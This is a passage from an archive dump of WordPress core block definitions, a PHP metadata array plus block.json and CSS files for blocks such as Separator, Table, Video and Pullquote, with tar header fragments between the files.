  'separator' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/separator',
    'title' => 'Separator',
    'category' => 'design',
    'description' => 'Create a break between ideas or sections with a horizontal separator.',
    'keywords' => array(
      'horizontal-line',
      'hr',
      'divider'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'opacity' => array(
        'type' => 'string',
        'default' => 'alpha-channel'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => array(
        'center',
        'wide',
        'full'
      ),
      'color' => array(
        'enableContrastChecker' => false,
        '__experimentalSkipSerialization' => true,
        'gradients' => true,
        'background' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'spacing' => array(
        'margin' => array(
          'top',
          'bottom'
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'styles' => array(
      array(
        'name' => 'default',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'wide',
        'label' => 'Wide Line'
      ),
      array(
        'name' => 'dots',
        'label' => 'Dots'
      )
    ),
    'editorStyle' => 'wp-block-separator-editor',
    'style' => 'wp-block-separator'
  ),
  'shortcode' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/shortcode',
    'title' => 'Shortcode',
    'category' => 'widgets',
    'description' => 'Insert additional custom elements with a WordPress shortcode.',
    'textdomain' => 'default',
    'attributes' => array(
      'text' => array(
        'type' => 'string',
        'source' => 'raw'
      )
    ),
    'supports' => array(
      'className' => false,
      'customClassName' => false,
      'html' => false
    ),
    'editorStyle' => 'wp-block-shortcode-editor'
  ),
  'site-logo' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/site-logo',
    'title' => 'Site Logo',
    'category' => 'theme',
    'description' => 'Display an image to represent this site. Update this block and the changes apply everywhere.',
    'textdomain' => 'default',
    'attributes' => array(
      'width' => array(
        'type' => 'number'
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      ),
      'shouldSyncIcon' => array(
        'type' => 'boolean'
      )
    ),
    'example' => array(
      'viewportWidth' => 500,
      'attributes' => array(
        'width' => 350,
        'className' => 'block-editor-block-types-list__site-logo-example'
      )
    ),
    'supports' => array(
      'html' => false,
      'align' => true,
      'alignWide' => false,
      'color' => array(
        '__experimentalDuotone' => 'img, .components-placeholder__illustration, .components-placeholder::before',
        'text' => false,
        'background' => false
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'styles' => array(
      array(
        'name' => 'default',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'rounded',
        'label' => 'Rounded'
      )
    ),
    'editorStyle' => 'wp-block-site-logo-editor',
    'style' => 'wp-block-site-logo'
  ),
  'site-tagline' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/site-tagline',
    'title' => 'Site Tagline',
    'category' => 'theme',
    'description' => 'Describe in a few words what the site is about. The tagline can be used in search results or when sharing on social networks even if it’s not displayed in the theme design.',
    'keywords' => array(
      'description'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'level' => array(
        'type' => 'number',
        'default' => 0
      )
    ),
    'example' => array(
      
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-site-tagline-editor'
  ),
  'site-title' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/site-title',
    'title' => 'Site Title',
    'category' => 'theme',
    'description' => 'Displays the name of this site. Update the block, and the changes apply everywhere it’s used. This will also appear in the browser title bar and in search results.',
    'textdomain' => 'default',
    'attributes' => array(
      'level' => array(
        'type' => 'number',
        'default' => 1
      ),
      'textAlign' => array(
        'type' => 'string'
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      )
    ),
    'example' => array(
      'viewportWidth' => 500
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'padding' => true,
        'margin' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-site-title-editor',
    'style' => 'wp-block-site-title'
  ),
  'social-link' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/social-link',
    'title' => 'Social Icon',
    'category' => 'widgets',
    'parent' => array(
      'core/social-links'
    ),
    'description' => 'Display an icon linking to a social profile or site.',
    'textdomain' => 'default',
    'attributes' => array(
      'url' => array(
        'type' => 'string'
      ),
      'service' => array(
        'type' => 'string'
      ),
      'label' => array(
        'type' => 'string'
      ),
      'rel' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'openInNewTab',
      'showLabels',
      'iconColor',
      'iconColorValue',
      'iconBackgroundColor',
      'iconBackgroundColorValue'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-social-link-editor'
  ),
  'social-links' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/social-links',
    'title' => 'Social Icons',
    'category' => 'widgets',
    'allowedBlocks' => array(
      'core/social-link'
    ),
    'description' => 'Display icons linking to your social profiles or sites.',
    'keywords' => array(
      'links'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'iconColor' => array(
        'type' => 'string'
      ),
      'customIconColor' => array(
        'type' => 'string'
      ),
      'iconColorValue' => array(
        'type' => 'string'
      ),
      'iconBackgroundColor' => array(
        'type' => 'string'
      ),
      'customIconBackgroundColor' => array(
        'type' => 'string'
      ),
      'iconBackgroundColorValue' => array(
        'type' => 'string'
      ),
      'openInNewTab' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'showLabels' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'size' => array(
        'type' => 'string'
      )
    ),
    'providesContext' => array(
      'openInNewTab' => 'openInNewTab',
      'showLabels' => 'showLabels',
      'iconColor' => 'iconColor',
      'iconColorValue' => 'iconColorValue',
      'iconBackgroundColor' => 'iconBackgroundColor',
      'iconBackgroundColorValue' => 'iconBackgroundColorValue'
    ),
    'supports' => array(
      'align' => array(
        'left',
        'center',
        'right'
      ),
      'anchor' => true,
      '__experimentalExposeControlsToChildren' => true,
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'allowVerticalAlignment' => false,
        'default' => array(
          'type' => 'flex'
        )
      ),
      'color' => array(
        'enableContrastChecker' => false,
        'background' => true,
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => false
        )
      ),
      'spacing' => array(
        'blockGap' => array(
          'horizontal',
          'vertical'
        ),
        'margin' => true,
        'padding' => true,
        'units' => array(
          'px',
          'em',
          'rem',
          'vh',
          'vw'
        ),
        '__experimentalDefaultControls' => array(
          'blockGap' => true,
          'margin' => true,
          'padding' => false
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'styles' => array(
      array(
        'name' => 'default',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'logos-only',
        'label' => 'Logos Only'
      ),
      array(
        'name' => 'pill-shape',
        'label' => 'Pill Shape'
      )
    ),
    'editorStyle' => 'wp-block-social-links-editor',
    'style' => 'wp-block-social-links'
  ),
  'spacer' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/spacer',
    'title' => 'Spacer',
    'category' => 'design',
    'description' => 'Add white space between blocks and customize its height.',
    'textdomain' => 'default',
    'attributes' => array(
      'height' => array(
        'type' => 'string',
        'default' => '100px'
      ),
      'width' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'orientation'
    ),
    'supports' => array(
      'anchor' => true,
      'spacing' => array(
        'margin' => array(
          'top',
          'bottom'
        ),
        '__experimentalDefaultControls' => array(
          'margin' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-spacer-editor',
    'style' => 'wp-block-spacer'
  ),
  'table' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/table',
    'title' => 'Table',
    'category' => 'text',
    'description' => 'Create structured content in rows and columns to display information.',
    'textdomain' => 'default',
    'attributes' => array(
      'hasFixedLayout' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'caption' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'figcaption'
      ),
      'head' => array(
        'type' => 'array',
        'default' => array(
          
        ),
        'source' => 'query',
        'selector' => 'thead tr',
        'query' => array(
          'cells' => array(
            'type' => 'array',
            'default' => array(
              
            ),
            'source' => 'query',
            'selector' => 'td,th',
            'query' => array(
              'content' => array(
                'type' => 'rich-text',
                'source' => 'rich-text'
              ),
              'tag' => array(
                'type' => 'string',
                'default' => 'td',
                'source' => 'tag'
              ),
              'scope' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'scope'
              ),
              'align' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'data-align'
              ),
              'colspan' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'colspan'
              ),
              'rowspan' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'rowspan'
              )
            )
          )
        )
      ),
      'body' => array(
        'type' => 'array',
        'default' => array(
          
        ),
        'source' => 'query',
        'selector' => 'tbody tr',
        'query' => array(
          'cells' => array(
            'type' => 'array',
            'default' => array(
              
            ),
            'source' => 'query',
            'selector' => 'td,th',
            'query' => array(
              'content' => array(
                'type' => 'rich-text',
                'source' => 'rich-text'
              ),
              'tag' => array(
                'type' => 'string',
                'default' => 'td',
                'source' => 'tag'
              ),
              'scope' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'scope'
              ),
              'align' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'data-align'
              ),
              'colspan' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'colspan'
              ),
              'rowspan' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'rowspan'
              )
            )
          )
        )
      ),
      'foot' => array(
        'type' => 'array',
        'default' => array(
          
        ),
        'source' => 'query',
        'selector' => 'tfoot tr',
        'query' => array(
          'cells' => array(
            'type' => 'array',
            'default' => array(
              
            ),
            'source' => 'query',
            'selector' => 'td,th',
            'query' => array(
              'content' => array(
                'type' => 'rich-text',
                'source' => 'rich-text'
              ),
              'tag' => array(
                'type' => 'string',
                'default' => 'td',
                'source' => 'tag'
              ),
              'scope' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'scope'
              ),
              'align' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'data-align'
              ),
              'colspan' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'colspan'
              ),
              'rowspan' => array(
                'type' => 'string',
                'source' => 'attribute',
                'attribute' => 'rowspan'
              )
            )
          )
        )
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => true,
      'color' => array(
        '__experimentalSkipSerialization' => true,
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      '__experimentalBorder' => array(
        '__experimentalSkipSerialization' => true,
        'color' => true,
        'style' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'style' => true,
          'width' => true
        )
      ),
      '__experimentalSelector' => '.wp-block-table > table',
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'styles' => array(
      array(
        'name' => 'regular',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'stripes',
        'label' => 'Stripes'
      )
    ),
    'editorStyle' => 'wp-block-table-editor',
    'style' => 'wp-block-table'
  ),
  'tag-cloud' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/tag-cloud',
    'title' => 'Tag Cloud',
    'category' => 'widgets',
    'description' => 'A cloud of your most used tags.',
    'textdomain' => 'default',
    'attributes' => array(
      'numberOfTags' => array(
        'type' => 'number',
        'default' => 45,
        'minimum' => 1,
        'maximum' => 100
      ),
      'taxonomy' => array(
        'type' => 'string',
        'default' => 'post_tag'
      ),
      'showTagCounts' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'smallestFontSize' => array(
        'type' => 'string',
        'default' => '8pt'
      ),
      'largestFontSize' => array(
        'type' => 'string',
        'default' => '22pt'
      )
    ),
    'styles' => array(
      array(
        'name' => 'default',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'outline',
        'label' => 'Outline'
      )
    ),
    'supports' => array(
      'html' => false,
      'align' => true,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalLetterSpacing' => true
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-tag-cloud-editor'
  ),
  'template-part' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/template-part',
    'title' => 'Template Part',
    'category' => 'theme',
    'description' => 'Edit the different global regions of your site, like the header, footer, sidebar, or create your own.',
    'textdomain' => 'default',
    'attributes' => array(
      'slug' => array(
        'type' => 'string'
      ),
      'theme' => array(
        'type' => 'string'
      ),
      'tagName' => array(
        'type' => 'string'
      ),
      'area' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'reusable' => false,
      'renaming' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-template-part-editor'
  ),
  'term-description' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/term-description',
    'title' => 'Term Description',
    'category' => 'theme',
    'description' => 'Display the description of categories, tags and custom taxonomies when viewing an archive.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'padding' => true,
        'margin' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'text-columns' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/text-columns',
    'title' => 'Text Columns (deprecated)',
    'icon' => 'columns',
    'category' => 'design',
    'description' => 'This block is deprecated. Please use the Columns block instead.',
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'array',
        'source' => 'query',
        'selector' => 'p',
        'query' => array(
          'children' => array(
            'type' => 'string',
            'source' => 'html'
          )
        ),
        'default' => array(
          array(
            
          ),
          array(
            
          )
        )
      ),
      'columns' => array(
        'type' => 'number',
        'default' => 2
      ),
      'width' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'inserter' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-text-columns-editor',
    'style' => 'wp-block-text-columns'
  ),
  'verse' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/verse',
    'title' => 'Verse',
    'category' => 'text',
    'description' => 'Insert poetry. Use special spacing formats. Or quote song lyrics.',
    'keywords' => array(
      'poetry',
      'poem'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'pre',
        '__unstablePreserveWhiteSpace' => true,
        '__experimentalRole' => 'content'
      ),
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        '__experimentalFontFamily' => true,
        'lineHeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      '__experimentalBorder' => array(
        'radius' => true,
        'width' => true,
        'color' => true,
        'style' => true
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-verse',
    'editorStyle' => 'wp-block-verse-editor'
  ),
  'video' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/video',
    'title' => 'Video',
    'category' => 'media',
    'description' => 'Embed a video from your media library or upload a new one.',
    'keywords' => array(
      'movie'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'autoplay' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'autoplay'
      ),
      'caption' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'figcaption',
        '__experimentalRole' => 'content'
      ),
      'controls' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'controls',
        'default' => true
      ),
      'id' => array(
        'type' => 'number',
        '__experimentalRole' => 'content'
      ),
      'loop' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'loop'
      ),
      'muted' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'muted'
      ),
      'poster' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'poster'
      ),
      'preload' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'preload',
        'default' => 'metadata'
      ),
      'src' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'src',
        '__experimentalRole' => 'content'
      ),
      'playsInline' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'video',
        'attribute' => 'playsinline'
      ),
      'tracks' => array(
        '__experimentalRole' => 'content',
        'type' => 'array',
        'items' => array(
          'type' => 'object'
        ),
        'default' => array(
          
        )
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => true,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-video-editor',
    'style' => 'wp-block-video'
  ),
  'widget-group' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/widget-group',
    'title' => 'Widget Group',
    'category' => 'widgets',
    'attributes' => array(
      'title' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'html' => false,
      'inserter' => true,
      'customClassName' => true,
      'reusable' => false
    ),
    'editorStyle' => 'wp-block-widget-group-editor',
    'style' => 'wp-block-widget-group'
  )
);post-author-biography/style.css000064400000000073151330427370012672 0ustar00.wp-block-post-author-biography{
  box-sizing:border-box;
}post-author-biography/block.json000060400000001713151330427370013003 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-author-biography",
	"title": "Author Biography",
	"category": "theme",
	"description": "The author biography.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		}
	},
	"usesContext": [ "postType", "postId" ],
	"supports": {
		"spacing": {
			"margin": true,
			"padding": true
		},
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
post-author-biography/style.min.css000064400000000066151330427370013456 0ustar00.wp-block-post-author-biography{box-sizing:border-box}post-author-biography/style-rtl.css000064400000000073151330427370013471 0ustar00.wp-block-post-author-biography{
  box-sizing:border-box;
}post-author-biography/style-rtl.min.css000064400000000066151330427370014255 0ustar00.wp-block-post-author-biography{box-sizing:border-box}pullquote/style-rtl.min.css000060400000002032151330427370012027 0ustar00.wp-block-pullquote{box-sizing:border-box;margin:0 0 1em;overflow-wrap:break-word;padding:4em 0;text-align:center}.wp-block-pullquote blockquote,.wp-block-pullquote cite,.wp-block-pullquote p{color:inherit}.wp-block-pullquote blockquote{margin:0}.wp-block-pullquote p{margin-top:0}.wp-block-pullquote p:last-child{margin-bottom:0}.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{max-width:420px}.wp-block-pullquote cite,.wp-block-pullquote footer{position:relative}.wp-block-pullquote .has-text-color a{color:inherit}.wp-block-pullquote.has-text-align-left blockquote{text-align:right}.wp-block-pullquote.has-text-align-right blockquote{text-align:left}.wp-block-pullquote.is-style-solid-color{border:none}.wp-block-pullquote.is-style-solid-color blockquote{margin-left:auto;margin-right:auto;max-width:60%}.wp-block-pullquote.is-style-solid-color blockquote p{font-size:2em;margin-bottom:0;margin-top:0}.wp-block-pullquote.is-style-solid-color blockquote cite{font-style:normal;text-transform:none}.wp-block-pullquote cite{color:inherit}pullquote/theme.min.css000060400000000413151330427370011173 0ustar00.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}pullquote/editor.css000060400000000407151330427370010600 0ustar00.wp-block-pullquote.is-style-solid-color blockquote p{
  font-size:32px;
}
.wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{
  font-style:normal;
  text-transform:none;
}

.wp-block-pullquote .wp-block-pullquote__citation{
  color:inherit;
}pullquote/style-rtl.css000060400000002222151330427370011246 0ustar00.wp-block-pullquote{
  box-sizing:border-box;
  margin:0 0 1em;
  overflow-wrap:break-word;
  padding:4em 0;
  text-align:center;
}
.wp-block-pullquote blockquote,.wp-block-pullquote cite,.wp-block-pullquote p{
  color:inherit;
}
.wp-block-pullquote blockquote{
  margin:0;
}
.wp-block-pullquote p{
  margin-top:0;
}
.wp-block-pullquote p:last-child{
  margin-bottom:0;
}
.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{
  max-width:420px;
}
.wp-block-pullquote cite,.wp-block-pullquote footer{
  position:relative;
}
.wp-block-pullquote .has-text-color a{
  color:inherit;
}

.wp-block-pullquote.has-text-align-left blockquote{
  text-align:right;
}

.wp-block-pullquote.has-text-align-right blockquote{
  text-align:left;
}

.wp-block-pullquote.is-style-solid-color{
  border:none;
}
.wp-block-pullquote.is-style-solid-color blockquote{
  margin-left:auto;
  margin-right:auto;
  max-width:60%;
}
.wp-block-pullquote.is-style-solid-color blockquote p{
  font-size:2em;
  margin-bottom:0;
  margin-top:0;
}
.wp-block-pullquote.is-style-solid-color blockquote cite{
  font-style:normal;
  text-transform:none;
}

.wp-block-pullquote cite{
  color:inherit;
}pullquote/editor.min.css000060400000000362151330427370011362 0ustar00.wp-block-pullquote.is-style-solid-color blockquote p{font-size:32px}.wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{font-style:normal;text-transform:none}.wp-block-pullquote .wp-block-pullquote__citation{color:inherit}pullquote/theme-rtl.min.css000060400000000413151330427370011772 0ustar00.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}pullquote/theme-rtl.css000060400000000450151330427370011211 0ustar00.wp-block-pullquote{
  border-bottom:4px solid;
  border-top:4px solid;
  color:currentColor;
  margin-bottom:1.75em;
}
.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{
  color:currentColor;
  font-size:.8125em;
  font-style:normal;
  text-transform:uppercase;
}pullquote/block.json000060400000003233151330427370010565 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/pullquote",
	"title": "Pullquote",
	"category": "text",
	"description": "Give special visual emphasis to a quote from your text.",
	"textdomain": "default",
	"attributes": {
		"value": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "p",
			"__experimentalRole": "content"
		},
		"citation": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "cite",
			"__experimentalRole": "content"
		},
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"anchor": true,
		"align": [ "left", "right", "wide", "full" ],
		"color": {
			"gradients": true,
			"background": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"style": true,
			"width": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"style": true,
				"width": true
			}
		},
		"__experimentalStyle": {
			"typography": {
				"fontSize": "1.5em",
				"lineHeight": "1.6"
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-pullquote-editor",
	"style": "wp-block-pullquote"
}
pullquote/theme.css000060400000000450151330427370010412 0ustar00.wp-block-pullquote{
  border-bottom:4px solid;
  border-top:4px solid;
  color:currentColor;
  margin-bottom:1.75em;
}
.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{
  color:currentColor;
  font-size:.8125em;
  font-style:normal;
  text-transform:uppercase;
}pullquote/editor-rtl.css000060400000000407151330427370011377 0ustar00.wp-block-pullquote.is-style-solid-color blockquote p{
  font-size:32px;
}
.wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{
  font-style:normal;
  text-transform:none;
}

.wp-block-pullquote .wp-block-pullquote__citation{
  color:inherit;
